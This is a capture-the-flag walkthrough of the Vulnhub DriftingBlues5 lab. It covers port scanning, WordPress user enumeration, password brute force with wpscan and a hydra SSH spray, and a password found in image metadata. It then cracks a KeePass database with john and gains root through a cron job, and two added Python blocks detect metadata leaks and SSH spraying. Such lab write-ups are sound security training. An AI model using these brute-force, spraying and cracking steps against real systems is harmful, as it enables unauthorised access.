Target Machine Pentest Practice - Vulnhub - Driftingblues5

Host discovery

nmap 222.24.6.0/24

Output:

Nmap scan report for 222.24.6.173
Host is up (0.00084s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Detailed port scan:

nmap -sV -A -p- -T4 222.24.6.173

Output:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 15:31 CST
Nmap scan report for 222.24.6.173
Host is up (0.0041s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: diary – Just another WordPress site
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds

HTTP

The site is built on WordPress, so try enumerating directories:

gobuster dir -u http://222.24.6.173/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html -e

Some results appear:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://222.24.6.173/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://222.24.6.173/.html (Status: 403) [Size: 277]
http://222.24.6.173/.php (Status: 403) [Size: 277]
http://222.24.6.173/index.php (Status: 301) [Size: 0] [--> http://222.24.6.173/]
http://222.24.6.173/wp-content (Status: 301) [Size: 317] [--> http://222.24.6.173/wp-content/]
http://222.24.6.173/license.txt (Status: 200) [Size: 19915]
http://222.24.6.173/wp-includes (Status: 301) [Size: 318] [--> http://222.24.6.173/wp-includes/]
http://222.24.6.173/wp-login.php (Status: 200) [Size: 6625]
http://222.24.6.173/readme.html (Status: 200) [Size: 7278]
http://222.24.6.173/wp-trackback.php (Status: 200) [Size: 135]
http://222.24.6.173/wp-admin (Status: 301) [Size: 315] [--> http://222.24.6.173/wp-admin/]
http://222.24.6.173/xmlrpc.php (Status: 405) [Size: 42]
http://222.24.6.173/.php (Status: 403) [Size: 277]
http://222.24.6.173/.html (Status: 403) [Size: 277]
http://222.24.6.173/wp-signup.php (Status: 302) [Size: 0] [--> http://222.24.6.173/wp-login.php?action=register]
http://222.24.6.173/server-status (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

Browsing the wp-content directory, /wp-content/uploads/2021/02 contains a dblogo.png that never appears on any page of the site.

WordPress

Scan:

wpscan --url http://222.24.6.173/

Try enumerating usernames:

wpscan --url http://222.24.6.173/ -eu

Output:

[i] User(s) Identified:

[+] abuzerkomurcu
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://222.24.6.173/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] collins
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] gill
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] satanic
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] gadd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

Try brute-forcing the users' passwords; first build a wordlist from the site's own content:

cewl -d 2 -m 4 -w passwd.txt --with-numbers http://222.24.6.173/index.php

Write the discovered usernames to user.txt and start the attack:

wpscan --url http://222.24.6.173/ -U user.txt -P passwd.txt

One hit:

[+] Performing password attack on Wp Login against 5 user/s
[SUCCESS] - gill / interchangeable
Trying collins / pricey Time: 00:00:31 <============================================================================================================== > (6658 / 8077) 82.43% ETA: ??:??:??

[!] Valid Combinations Found:
| Username: gill, Password: interchangeable

Logging in works, but the account has no administrator privileges.

SSH

The SSH password is hidden in the image; check its metadata with exiftool:

exiftool dblogo.png

Output:

ExifTool Version Number         : 12.76
File Name : dblogo.png
Directory : .
File Size : 19 kB
File Modification Date/Time : 2024:03:19 15:37:53+08:00
File Access Date/Time : 2024:03:19 15:49:57+08:00
File Inode Change Date/Time : 2024:03:19 15:49:57+08:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 300
Image Height : 300
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
SRGB Rendering : Perceptual
Gamma : 2.2
Pixels Per Unit X : 2835
Pixels Per Unit Y : 2835
Pixel Units : meters
XMP Toolkit : Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39
Creator Tool : Adobe Photoshop CC 2018 (Windows)
Create Date : 2021:02:24 02:55:28+03:00
Metadata Date : 2021:02:24 02:55:28+03:00
Modify Date : 2021:02:24 02:55:28+03:00
Instance ID : xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
Document ID : adobe:docid:photoshop:7232d876-a1d0-044b-9604-08837143888b
Original Document ID : xmp.did:5890be6c-649b-0248-af9b-19889727200c
Color Mode : RGB
ICC Profile Name : sRGB IEC61966-2.1
Format : image/png
History Action : created, saved
History Instance ID : xmp.iid:5890be6c-649b-0248-af9b-19889727200c, xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
History When : 2021:02:24 02:55:28+03:00, 2021:02:24 02:55:28+03:00
History Software Agent : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed : /
Text Layer Name : ssh password is 59583hello of course it is lowercase maybe not
Text Layer Text : ssh password is 59583hello of course it is lowercase maybe not :)
Document Ancestors : adobe:docid:photoshop:871a8adf-5521-894c-8a18-2b27c91a893b
Image Size : 300x300
Megapixels : 0.090
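
The leak above sits in the PNG's XMP metadata, which Photoshop writes into an iTXt chunk; exiftool only surfaces it. As an added example (not part of the original write-up), the Python below walks the PNG chunk structure, decodes tEXt/iTXt text and flags fragments containing credential-like words, the kind of check a publishing pipeline could run on uploads before they land in wp-content; the sample image it builds and the keyword list are constructed for this demonstration.

```python
import re, struct, zlib

# Words that, in image metadata, almost always mean a credential was left behind.
SENSITIVE = re.compile(r"\b(password|passwd|secret|api[_ -]?key|token)\b", re.I)
PNG_SIG = b"\x89PNG\r\n\x1a\n"

def iter_png_chunks(data):
    """Yield (type, payload) for every chunk after the 8-byte signature."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG file")
    pos = 8
    while pos + 12 <= len(data):  # 4-byte length + 4-byte type + payload + 4-byte CRC
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        yield ctype, data[pos + 8:pos + 8 + length]
        pos += 12 + length

def extract_text(ctype, payload):
    """Decode tEXt and iTXt chunks to (keyword, text); None for other chunk types."""
    key, _, rest = payload.partition(b"\x00")
    if ctype == b"tEXt":
        return key.decode("latin-1"), rest.decode("latin-1")
    if ctype == b"iTXt":  # flag, method, lang\0, translated-keyword\0, UTF-8 text
        compressed, rest = rest[0], rest[2:]
        _lang, _, rest = rest.partition(b"\x00")
        _tkey, _, text = rest.partition(b"\x00")
        return key.decode("latin-1"), (zlib.decompress(text) if compressed else text).decode()
    return None

def find_leaks(png_bytes):
    """Return [(chunk_type, keyword, fragment)] for text fragments matching SENSITIVE."""
    hits = []
    for ctype, payload in iter_png_chunks(png_bytes):
        found = extract_text(ctype, payload)
        for frag in (re.split(r"[\r\n<>]+", found[1]) if found else []):  # split XMP on tags
            if SENSITIVE.search(frag):
                hits.append((ctype.decode(), found[0], frag.strip()))
    return hits

def _chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

def build_sample_png(layer_text):
    """Constructed 1x1 PNG whose iTXt chunk carries Photoshop-style XMP (test fixture only)."""
    xmp = ("<x:xmpmeta><photoshop:TextLayers><rdf:li><photoshop:LayerText>%s"
           "</photoshop:LayerText></rdf:li></photoshop:TextLayers></x:xmpmeta>" % layer_text)
    itxt = b"XML:com.adobe.xmp\x00" + b"\x00\x00" + b"\x00" + b"\x00" + xmp.encode()
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit greyscale
    return (PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"iTXt", itxt)
            + _chunk(b"IDAT", zlib.compress(b"\x00\x00")) + _chunk(b"IEND", b""))
```

Run `find_leaks(open("dblogo.png", "rb").read())` against a real upload; any non-empty result is a file that should not be published as-is.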

It is unclear which user the password belongs to, so try spraying it across the user list:

hydra -L user.txt -p 59583hello ssh://222.24.6.173 -t 20

It turns out to be gill's again:

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-19 15:53:41
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 5 tasks per 1 server, overall 5 tasks, 5 login tries (l:5/p:1), ~1 try per task
[DATA] attacking ssh://222.24.6.173:22/
[22][ssh] host: 222.24.6.173 login: gill password: 59583hello
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-19 15:53:45
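
A single password tried across a user list, as with hydra above, leaves a distinctive sshd footprint: one source address, several distinct usernames, seconds apart. As an added example (not from the original write-up), the detector below groups sshd password attempts from constructed auth.log lines by source address and flags any source that tries three or more accounts within a minute, listing any login it eventually got accepted; the log lines, hostname and thresholds are constructed for this demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed /var/log/auth.log excerpt: one password tried against five accounts from
# one source within seconds, the footprint a `hydra -L users -p <pw>` run leaves behind.
SAMPLE_LOG = """\
Mar 19 15:53:41 driftingblues sshd[1401]: Failed password for abuzerkomurcu from 222.24.6.149 port 50212 ssh2
Mar 19 15:53:41 driftingblues sshd[1402]: Failed password for invalid user collins from 222.24.6.149 port 50214 ssh2
Mar 19 15:53:42 driftingblues sshd[1403]: Failed password for invalid user satanic from 222.24.6.149 port 50216 ssh2
Mar 19 15:53:42 driftingblues sshd[1404]: Failed password for invalid user gadd from 222.24.6.149 port 50218 ssh2
Mar 19 15:53:43 driftingblues sshd[1405]: Accepted password for gill from 222.24.6.149 port 50220 ssh2
Mar 19 16:10:02 driftingblues sshd[1512]: Failed password for gill from 10.0.0.7 port 40001 ssh2
Mar 19 16:10:09 driftingblues sshd[1513]: Accepted password for gill from 10.0.0.7 port 40002 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+")

def parse_auth_log(text, year=2024):
    """Yield (timestamp, result, user, ip) for every sshd password-auth line."""
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            ts = datetime.strptime("%d %s" % (year, m["ts"]), "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def detect_spray(text, min_users=3, window_s=60):
    """Return {ip: {"users_tried": [...], "accepted": [...]}} for sources that tried
    at least min_users distinct accounts within window_s seconds. Accepted logins from
    a flagged source are listed too: a spray that ends in success is the one to act on."""
    by_ip = defaultdict(list)
    for ts, result, user, ip in parse_auth_log(text):
        by_ip[ip].append((ts, user, result))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        for i, (start, _, _) in enumerate(events):  # slide the window over each start time
            users = {u for t, u, _ in events[i:] if (t - start).total_seconds() <= window_s}
            if len(users) >= min_users:
                flagged[ip] = {"users_tried": sorted(users),
                               "accepted": sorted({u for _, u, r in events if r == "Accepted"})}
                break
    return flagged
```

The second source (10.0.0.7) fails once and then succeeds on the same account, a normal typo pattern, and is not flagged; the first source is flagged with gill listed under accepted.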

Connect and grab the first flag:

ssh gill@222.24.6.173
cat user.txt

The home directory also contains keyfile.kdbx, a database file created by the KeePass password manager; download it first:

scp -rp gill@222.24.6.173:/home/gill/keyfile.kdbx .

Crack the database's master password:

keepass2john keyfile.kdbx > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

A password is found:

Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 32 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
porsiempre (keyfile)
1g 0:00:00:04 DONE (2024-03-19 16:01) 0.2375g/s 1641p/s 1641c/s 1641C/s polly..better
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Open it with KeePassXC to retrieve a set of passwords:

2real4surreal
buddyretard
closet313
exalted
fracturedocean
zakkwylde

Privilege escalation

Try to inspect the scheduled tasks:

cat /var/spool/cron/*

No permission, so upload pspy64 to watch processes instead. Start Apache on the attacking machine, drop pspy64 into /var/www/html, then download it on the target:

wget http://222.24.6.149/pspy64

Run it:

chmod +x ./pspy64
./pspy64

Output:

pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d



Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/03/19 03:21:13 CMD: UID=1000 PID=1300 | ./pspy64
2024/03/19 03:21:13 CMD: UID=0 PID=1294 |
2024/03/19 03:21:13 CMD: UID=0 PID=1256 |
2024/03/19 03:21:13 CMD: UID=1000 PID=1109 | -bash
2024/03/19 03:21:13 CMD: UID=1000 PID=1108 | sshd: gill@pts/0
2024/03/19 03:21:13 CMD: UID=1000 PID=1095 | (sd-pam)
2024/03/19 03:21:13 CMD: UID=1000 PID=1094 | /lib/systemd/systemd --user
2024/03/19 03:21:13 CMD: UID=0 PID=1091 | sshd: gill [priv]
2024/03/19 03:21:13 CMD: UID=33 PID=1011 | /usr/sbin/apache2 -k start
2024/03/19 03:21:13 CMD: UID=33 PID=1006 | /usr/sbin/apache2 -k start
2024/03/19 03:21:13 CMD: UID=33 PID=1003 | /usr/sbin/apache2 -k start
2024/03/19 03:21:13 CMD: UID=33 PID=1002 | /usr/sbin/apache2 -k start
2024/03/19 03:21:13 CMD: UID=33 PID=1001 | /usr/sbin/apache2 -k start
2024/03/19 03:21:13 CMD: UID=33 PID=1000 | /usr/sbin/apache2 -k start
2024/03/19 03:21:13 CMD: UID=33 PID=875 | /usr/sbin/apache2 -k start
2024/03/19 03:21:13 CMD: UID=33 PID=873 | /usr/sbin/apache2 -k start
2024/03/19 03:21:13 CMD: UID=33 PID=864 | /usr/sbin/apache2 -k start
2024/03/19 03:21:13 CMD: UID=33 PID=639 | /usr/sbin/apache2 -k start
2024/03/19 03:21:13 CMD: UID=106 PID=507 | /usr/sbin/mysqld
2024/03/19 03:21:13 CMD: UID=0 PID=505 | /usr/sbin/apache2 -k start
2024/03/19 03:21:13 CMD: UID=0 PID=431 | /usr/sbin/sshd -D
2024/03/19 03:21:13 CMD: UID=0 PID=417 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2024/03/19 03:21:13 CMD: UID=0 PID=401 | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
2024/03/19 03:21:13 CMD: UID=0 PID=369 | /usr/sbin/cron -f
2024/03/19 03:21:13 CMD: UID=0 PID=368 | /lib/systemd/systemd-logind
2024/03/19 03:21:13 CMD: UID=104 PID=367 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2024/03/19 03:21:13 CMD: UID=0 PID=366 | /usr/sbin/rsyslogd -n -iNONE
2024/03/19 03:21:13 CMD: UID=101 PID=359 | /lib/systemd/systemd-timesyncd
2024/03/19 03:21:13 CMD: UID=0 PID=347 |
2024/03/19 03:21:13 CMD: UID=0 PID=346 |
2024/03/19 03:21:13 CMD: UID=0 PID=340 |
2024/03/19 03:21:13 CMD: UID=0 PID=339 |
2024/03/19 03:21:13 CMD: UID=0 PID=338 |
2024/03/19 03:21:13 CMD: UID=0 PID=337 |
2024/03/19 03:21:13 CMD: UID=0 PID=272 |
2024/03/19 03:21:13 CMD: UID=0 PID=271 |
2024/03/19 03:21:13 CMD: UID=0 PID=237 | /lib/systemd/systemd-udevd
2024/03/19 03:21:13 CMD: UID=0 PID=218 | /lib/systemd/systemd-journald
2024/03/19 03:21:13 CMD: UID=0 PID=187 |
2024/03/19 03:21:13 CMD: UID=0 PID=186 |
2024/03/19 03:21:13 CMD: UID=0 PID=184 |
2024/03/19 03:21:13 CMD: UID=0 PID=154 |
2024/03/19 03:21:13 CMD: UID=0 PID=112 |
2024/03/19 03:21:13 CMD: UID=0 PID=110 |
2024/03/19 03:21:13 CMD: UID=0 PID=108 |
2024/03/19 03:21:13 CMD: UID=0 PID=106 |
2024/03/19 03:21:13 CMD: UID=0 PID=105 |
2024/03/19 03:21:13 CMD: UID=0 PID=103 |
2024/03/19 03:21:13 CMD: UID=0 PID=102 |
2024/03/19 03:21:13 CMD: UID=0 PID=100 |
2024/03/19 03:21:13 CMD: UID=0 PID=95 |
2024/03/19 03:21:13 CMD: UID=0 PID=59 |
2024/03/19 03:21:13 CMD: UID=0 PID=50 |
2024/03/19 03:21:13 CMD: UID=0 PID=49 |
2024/03/19 03:21:13 CMD: UID=0 PID=48 |
2024/03/19 03:21:13 CMD: UID=0 PID=30 |
2024/03/19 03:21:13 CMD: UID=0 PID=29 |
2024/03/19 03:21:13 CMD: UID=0 PID=28 |
2024/03/19 03:21:13 CMD: UID=0 PID=27 |
2024/03/19 03:21:13 CMD: UID=0 PID=26 |
2024/03/19 03:21:13 CMD: UID=0 PID=25 |
2024/03/19 03:21:13 CMD: UID=0 PID=24 |
2024/03/19 03:21:13 CMD: UID=0 PID=23 |
2024/03/19 03:21:13 CMD: UID=0 PID=22 |
2024/03/19 03:21:13 CMD: UID=0 PID=21 |
2024/03/19 03:21:13 CMD: UID=0 PID=20 |
2024/03/19 03:21:13 CMD: UID=0 PID=19 |
2024/03/19 03:21:13 CMD: UID=0 PID=18 |
2024/03/19 03:21:13 CMD: UID=0 PID=17 |
2024/03/19 03:21:13 CMD: UID=0 PID=16 |
2024/03/19 03:21:13 CMD: UID=0 PID=15 |
2024/03/19 03:21:13 CMD: UID=0 PID=14 |
2024/03/19 03:21:13 CMD: UID=0 PID=12 |
2024/03/19 03:21:13 CMD: UID=0 PID=11 |
2024/03/19 03:21:13 CMD: UID=0 PID=10 |
2024/03/19 03:21:13 CMD: UID=0 PID=9 |
2024/03/19 03:21:13 CMD: UID=0 PID=8 |
2024/03/19 03:21:13 CMD: UID=0 PID=6 |
2024/03/19 03:21:13 CMD: UID=0 PID=4 |
2024/03/19 03:21:13 CMD: UID=0 PID=3 |
2024/03/19 03:21:13 CMD: UID=0 PID=2 |
2024/03/19 03:21:13 CMD: UID=0 PID=1 | /sbin/init
2024/03/19 03:21:52 CMD: UID=0 PID=1308 |
2024/03/19 03:22:01 CMD: UID=0 PID=1309 | /usr/sbin/CRON -f
2024/03/19 03:22:01 CMD: UID=0 PID=1310 | /usr/sbin/CRON -f
2024/03/19 03:22:01 CMD: UID=0 PID=1311 | /bin/sh -c /root/key.sh
2024/03/19 03:22:01 CMD: UID=0 PID=1312 | /bin/bash /root/key.sh

The tail of the output shows cron running /root/key.sh once a minute. Listing the filesystem root reveals a /keyfolder directory, so the guess is that key.sh reads it.

Create a file in /keyfolder named after each password from the KeePass database, one at a time. One minute after creating the file fracturedocean, rootcreds.txt appears:

touch fracturedocean
cat rootcreds.txt

It contains the password imjustdrifting31; switch to root with it and read the second flag:

cat /root/root.txt